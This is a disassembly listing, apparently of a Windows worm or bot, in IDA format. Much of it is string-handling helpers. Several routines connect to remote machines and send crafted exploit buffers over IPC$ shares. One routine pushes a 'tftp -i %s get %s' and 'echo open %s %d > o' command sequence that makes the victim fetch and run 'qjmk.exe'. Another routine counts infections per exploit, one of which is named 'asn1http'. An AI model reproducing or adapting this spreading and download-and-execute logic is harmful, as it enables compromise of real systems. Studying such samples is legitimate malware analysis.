push eax
call sub_401014
mov eax, [ebp+arg_A8]
add esp, 18h
imul eax, 3Ch
inc dword_42AF30[eax]
lea eax, dword_42AF30[eax]
loc_40261B: ; CODE XREF: sub_402413+1B9�j
mov eax, esi
loc_40261D: ; CODE XREF: sub_402413+A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_402413 endp
; ---------------------------------------------------------------------------
db 83h dup(0CCh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425084
loc_4026A5: ; CODE XREF: sub_425084:loc_401249�j
push 1
call sub_401050
retn
; END OF FUNCTION CHUNK FOR sub_425084
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4026AF proc near ; CODE XREF: sub_40130C�j
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_427084
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_4026C9
call sub_415573
loc_4026C9: ; CODE XREF: sub_4026AF+13�j
test ebx, ebx
jbe short loc_402700
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_401348
test al, al
jz short loc_402700
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_415CA0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_402700: ; CODE XREF: sub_4026AF+1C�j
; sub_4026AF+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4026AF endp
; ---------------------------------------------------------------------------
db 16h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40271E proc near ; CODE XREF: sub_401307�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_427084
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_402738
call sub_415573
loc_402738: ; CODE XREF: sub_40271E+13�j
test ebx, ebx
jbe short loc_40276D
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_401348
test al, al
jz short loc_40276D
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_415960
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40276D: ; CODE XREF: sub_40271E+1C�j
; sub_40271E+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40271E endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40278A proc near ; CODE XREF: sub_401258�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_4027A2
call sub_41579F
loc_4027A2: ; CODE XREF: sub_40278A+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_4027B4
mov esi, [ebp+arg_8]
loc_4027B4: ; CODE XREF: sub_40278A+25�j
cmp edi, ebx
jnz short loc_4027D6
push ds:dword_427084
add esi, ecx
mov ecx, edi
push esi
call sub_40115E
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_40115E
jmp short loc_40284F
; ---------------------------------------------------------------------------
loc_4027D6: ; CODE XREF: sub_40278A+2C�j
test esi, esi
jbe short loc_402819
cmp esi, eax
jnz short loc_402819
mov eax, [ebx+4]
test eax, eax
jnz short loc_4027EA
mov eax, offset dword_427094
loc_4027EA: ; CODE XREF: sub_40278A+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_402819
push 1
mov ecx, edi
call sub_401050
mov eax, [ebx+4]
test eax, eax
jnz short loc_402805
mov eax, offset dword_427094
loc_402805: ; CODE XREF: sub_40278A+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_40284F
; ---------------------------------------------------------------------------
loc_402819: ; CODE XREF: sub_40278A+4E�j
; sub_40278A+52�j ...
push 1
push esi
mov ecx, edi
call sub_401348
test al, al
jz short loc_40284F
mov eax, [ebx+4]
test eax, eax
jnz short loc_402833
mov eax, offset dword_427094
loc_402833: ; CODE XREF: sub_40278A+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_415960
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_40284F: ; CODE XREF: sub_40278A+4A�j
; sub_40278A+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40278A endp
; ---------------------------------------------------------------------------
db 33h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40288B proc near ; CODE XREF: sub_401348�j
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_40289D
call sub_415573
loc_40289D: ; CODE XREF: sub_40288B+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_4028C6
mov al, [ecx-1]
cmp al, dl
jz short loc_4028C6
cmp al, 0FFh
jz short loc_4028C6
cmp edi, edx
jnz short loc_402901
dec al
push edx
mov [ecx-1], al
loc_4028BB: ; CODE XREF: sub_40288B+47�j
mov ecx, esi
call sub_401050
loc_4028C2: ; CODE XREF: sub_40288B+4B�j
; sub_40288B+52�j
xor al, al
jmp short loc_40290B
; ---------------------------------------------------------------------------
loc_4028C6: ; CODE XREF: sub_40288B+19�j
; sub_40288B+20�j ...
cmp edi, edx
jnz short loc_4028DF
cmp [esp+8+arg_4], dl
jz short loc_4028D4
push 1
jmp short loc_4028BB
; ---------------------------------------------------------------------------
loc_4028D4: ; CODE XREF: sub_40288B+43�j
cmp ecx, edx
jz short loc_4028C2
mov [esi+8], edx
mov [ecx], dl
jmp short loc_4028C2
; ---------------------------------------------------------------------------
loc_4028DF: ; CODE XREF: sub_40288B+3D�j
cmp [esp+8+arg_4], dl
jz short loc_4028FC
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_4028F1
cmp eax, edi
jnb short loc_402909
loc_4028F1: ; CODE XREF: sub_40288B+60�j
push 1
mov ecx, esi
call sub_401050
jmp short loc_402901
; ---------------------------------------------------------------------------
loc_4028FC: ; CODE XREF: sub_40288B+58�j
cmp [esi+0Ch], edi
jnb short loc_402909
loc_402901: ; CODE XREF: sub_40288B+28�j
; sub_40288B+6F�j
push edi
mov ecx, esi
call sub_401208
loc_402909: ; CODE XREF: sub_40288B+64�j
; sub_40288B+74�j
mov al, 1
loc_40290B: ; CODE XREF: sub_40288B+39�j
pop edi
pop esi
retn 8
sub_40288B endp
; ---------------------------------------------------------------------------
db 21h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402931 proc near ; CODE XREF: sub_401050�j
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40295D
mov eax, [esi+4]
test eax, eax
jz short loc_40295D
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_402956
cmp al, 0FFh
jz short loc_402956
dec al
mov [ecx], al
jmp short loc_40295D
; ---------------------------------------------------------------------------
loc_402956: ; CODE XREF: sub_402931+19�j
; sub_402931+1D�j
push ecx
call sub_4158CA
pop ecx
loc_40295D: ; CODE XREF: sub_402931+8�j
; sub_402931+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_402931 endp
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40297C proc near ; CODE XREF: sub_4010F0�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_401348
test al, al
jz short loc_4029AA
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_415960
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_4029AA: ; CODE XREF: sub_40297C+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_40297C endp
; ---------------------------------------------------------------------------
db 0Dh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4029BE proc near ; CODE XREF: sub_40115E�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_4029D1
call sub_41579F
loc_4029D1: ; CODE XREF: sub_4029BE+C�j
mov ecx, edi
call sub_4012E4
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_4029E7
mov ebx, eax
loc_4029E7: ; CODE XREF: sub_4029BE+25�j
test ebx, ebx
jbe short loc_402A1D
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_416430
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_401348
test al, al
jz short loc_402A1D
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_402A1D: ; CODE XREF: sub_4029BE+2B�j
; sub_4029BE+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_4029BE endp
; ---------------------------------------------------------------------------
db 19h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402A3E proc near ; CODE XREF: sub_401208�j
mov eax, offset loc_4250D8
call sub_4163B8
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_402A64
mov edi, [ebp+8]
loc_402A64: ; CODE XREF: sub_402A3E+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_402A71
xor eax, eax
loc_402A71: ; CODE XREF: sub_402A3E+2F�j
push eax
call sub_416765
pop ecx
mov [ebp+8], eax
jmp short loc_402AA2
; ---------------------------------------------------------------------------
loc_402A7D: ; DATA XREF: .rdata:004281D4�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_402A8C
xor eax, eax
loc_402A8C: ; CODE XREF: sub_402A3E+4A�j
push eax
call sub_416765
mov [ebp+8], eax
pop ecx
mov eax, offset loc_402A9C
retn
; ---------------------------------------------------------------------------
loc_402A9C: ; DATA XREF: sub_402A3E+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_402AA2: ; CODE XREF: sub_402A3E+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_402AC0
cmp eax, edi
jbe short loc_402AAF
mov eax, edi
loc_402AAF: ; CODE XREF: sub_402A3E+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_415960
add esp, 0Ch
loc_402AC0: ; CODE XREF: sub_402A3E+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_401050
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_402AE0
mov edi, ebx
loc_402AE0: ; CODE XREF: sub_402A3E+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_402A3E endp
; ---------------------------------------------------------------------------
db 2Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402B2A proc near ; CODE XREF: sub_4012E4�j
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_402B57
mov al, [esi-1]
test al, al
jz short loc_402B57
cmp al, 0FFh
jz short loc_402B57
push 1
call sub_401050
push esi
call sub_4158E0
pop ecx
push eax
push esi
mov ecx, edi
call sub_4010F0
loc_402B57: ; CODE XREF: sub_402B2A+9�j
; sub_402B2A+10�j ...
pop edi
pop esi
retn
sub_402B2A endp
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_402B66 proc near ; DATA XREF: .data:00429104�o
test byte_492ADC, 1
jnz short loc_402B76
or byte_492ADC, 1
loc_402B76: ; CODE XREF: sub_402B66+7�j
jmp loc_402B80
; ---------------------------------------------------------------------------
align 10h
loc_402B80: ; CODE XREF: sub_402B66:loc_402B76�j
push offset j_nullsub_1
call sub_4167E0
pop ecx
retn
sub_402B66 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B90 proc near ; CODE XREF: sub_4010B4�j
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_49169C ; inet_addr
mov [ebp+var_C], eax
mov ax, word_42AB18
push eax
call dword_49165C ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_4916DC ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_402CC8
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402CC8
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_491674 ; recv
mov edi, offset aQjmk_exe ; "qjmk.exe"
push edi
push edi
push [ebp+arg_0]
call sub_401299
pop ecx
mov esi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_4163D7
add esp, 18h
push dword_43DB94
push [ebp+arg_0]
call sub_401299
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_4163D7
add esp, 14h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_402CC8
push 1F4h
call ds:dword_495324 ; Sleep
push edi
push offset aS ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_4163D7
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_402CCC
loc_402CC8: ; CODE XREF: sub_402B90+51�j
; sub_402B90+67�j ...
xor al, al
jmp short loc_402CEA
; ---------------------------------------------------------------------------
loc_402CCC: ; CODE XREF: sub_402B90+136�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_491674 ; recv
push ebx
call dword_4916F4 ; closesocket
mov al, 1
loc_402CEA: ; CODE XREF: sub_402B90+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_402B90 endp
; ---------------------------------------------------------------------------
db 57h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D46 proc near ; CODE XREF: sub_40119A�j
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_416880
mov eax, dword_42AEBC
push ebx
mov [ebp+var_10], eax
mov eax, dword_42AEC0
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_416821
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_402D85: ; CODE XREF: sub_402D46+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_402D85
push 60h
lea eax, [ebp+var_B4]
push offset dword_42A728
push eax
call sub_415960
lea eax, [ebp+var_3C]
push eax
call sub_4158E0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_415960
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_1+3)
push eax
call sub_4158E0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_415960
lea eax, [ebp+var_3C]
push eax
call sub_4158E0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_415960
lea eax, [ebp+var_3C]
push eax
call sub_4158E0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_415960
mov ax, word_42AB18
add esp, 2Ch
push eax
call dword_49165C ; htons
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_42A428
call sub_415960
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_402F42
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_415CA0
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_42AB58[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_415960
mov esi, offset dword_42A378
push esi
call sub_4158E0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_415960
push 4
lea eax, [ebp+var_11AC]
push offset dword_42AEA8
push eax
call sub_415960
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_415960
add esp, 40h
push esi
call sub_4158E0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_415960
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_402EFB: ; CODE XREF: sub_402D46+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_402EFB
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_415CA0
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_415CA0
add esp, 18h
jmp short loc_402F99
; ---------------------------------------------------------------------------
loc_402F42: ; CODE XREF: sub_402D46+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_415CA0
mov esi, offset dword_42A378
push esi
call sub_4158E0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_415960
lea eax, [ebp+var_10]
push eax
call sub_4158E0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_415960
mov eax, dword_42AB58
add esp, 2Ch
mov [ebp+var_768], eax
loc_402F99: ; CODE XREF: sub_402D46+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_415CA0
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_402FD8
loc_402FD1: ; CODE XREF: sub_402D46+2B9�j
; sub_402D46+2E0�j ...
xor al, al
jmp loc_403180
; ---------------------------------------------------------------------------
loc_402FD8: ; CODE XREF: sub_402D46+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_491674 ; recv
push ebx
push 68h
push offset dword_42A78C
push edi
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_402FD1
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_491674 ; recv
push ebx
push 0A0h
push offset dword_42A7F8
push edi
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_402FD1
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_491674 ; recv
cmp [ebp+arg_C0], ebx
jz loc_4030EE
push 68h
lea eax, [ebp+var_89B4]
push offset dword_42A9B0
push eax
call sub_415960
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_415960
push 70h
lea eax, [ebp+var_68DC]
push offset dword_42AA1C
push eax
call sub_415960
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_415960
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_42AA90
push eax
call sub_415960
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz loc_402FD1
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call dword_491674 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_403144
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402D46+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_42A89C
push eax
call sub_415960
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_415960
push 90h
lea eax, [ebp+var_245C]
push offset off_42A91C
push eax
call sub_415960
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_403144: ; CODE XREF: sub_402D46+3A6�j
push eax
push edi
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz loc_402FD1
push 12Ch
call ds:dword_495324 ; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4010B4
add esp, 0BCh
test al, al
setnz al
loc_403180: ; CODE XREF: sub_402D46+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_402D46 endp
; ---------------------------------------------------------------------------
db 10Fh dup(0CCh)
; ---------------------------------------------------------------------------
loc_403294: ; CODE XREF: .text:00401294�j
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call dword_49169C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_49165C ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4916DC ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40338D
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40338D
push edi
push 89h
push offset dword_42A510
push ebx
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_40338D
mov esi, 640h
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_491674 ; recv
push edi
push 0A8h
push offset dword_42A59C
push ebx
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_40338D
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_491674 ; recv
push edi
push 0DEh
push offset dword_42A648
push ebx
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz short loc_40338D
push edi
lea eax, [ebp-854h]
push esi
push eax
push ebx
call dword_491674 ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_403397
dec eax
jz short loc_403394
loc_40338D: ; CODE XREF: .text:004032E8�j
; .text:004032FE�j ...
xor eax, eax
jmp loc_40345A
; ---------------------------------------------------------------------------
loc_403394: ; CODE XREF: .text:0040338B�j
push edi
jmp short loc_4033BB
; ---------------------------------------------------------------------------
loc_403397: ; CODE XREF: .text:00403388�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40119A
add esp, 0C4h
test al, al
jnz short loc_4033DB
push 1
loc_4033BB: ; CODE XREF: .text:00403395�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40119A
add esp, 0C4h
test al, al
jz short loc_4033E2
loc_4033DB: ; CODE XREF: .text:004033B7�j
mov dword ptr [ebp-4], 1
loc_4033E2: ; CODE XREF: .text:004033D9�j
push ebx
call dword_4916F4 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_403457
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aAsn1http ; "asn1http"
push eax
push offset dword_42AEC8
lea eax, [ebp-214h]
push 200h
push eax
call sub_4163D7
push 0
lea eax, [ebp-214h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_4010D2
lea eax, [ebp-214h]
push eax
call sub_401014
mov eax, [ebp+0B0h]
add esp, 2Ch
imul eax, 3Ch
inc dword_42AF30[eax]
lea eax, dword_42AF30[eax]
loc_403457: ; CODE XREF: .text:004033ED�j
push 1
pop eax
loc_40345A: ; CODE XREF: .text:0040338F�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 72h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034D1 proc near ; CODE XREF: sub_4011CC�j
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset dword_42B288
push eax
xor ebx, ebx
call sub_416821
cmp dword_42AF28, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40353F
push esi
mov esi, offset dword_42AF30
loc_403504: ; CODE XREF: sub_4034D1+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_416821
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_4168B0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_403504
pop esi
loc_40353F: ; CODE XREF: sub_4034D1+2B�j
push dword_4834B0
call sub_4011AE
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_416821
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_4168B0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4010D2
lea eax, [ebp+var_200]
push eax
call sub_401014
add esp, 38h
pop edi
pop ebx
leave
retn
sub_4034D1 endp
; ---------------------------------------------------------------------------
db 32h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035CD proc near ; CODE XREF: sub_4010EB�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_4010E6
test eax, eax
pop ecx
jle short loc_403609
mov eax, [ebp+arg_C]
push dword_4370C0[eax*8]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset dword_42B2EC
push eax
call sub_416821
add esp, 0Ch
jmp short loc_40361C
; ---------------------------------------------------------------------------
loc_403609: ; CODE XREF: sub_4035CD+13�j
lea eax, [ebp+var_200]
push offset dword_42B2BC
push eax
call sub_416821
pop ecx
pop ecx
loc_40361C: ; CODE XREF: sub_4035CD+3A�j
push 0
lea eax, [ebp+var_200]
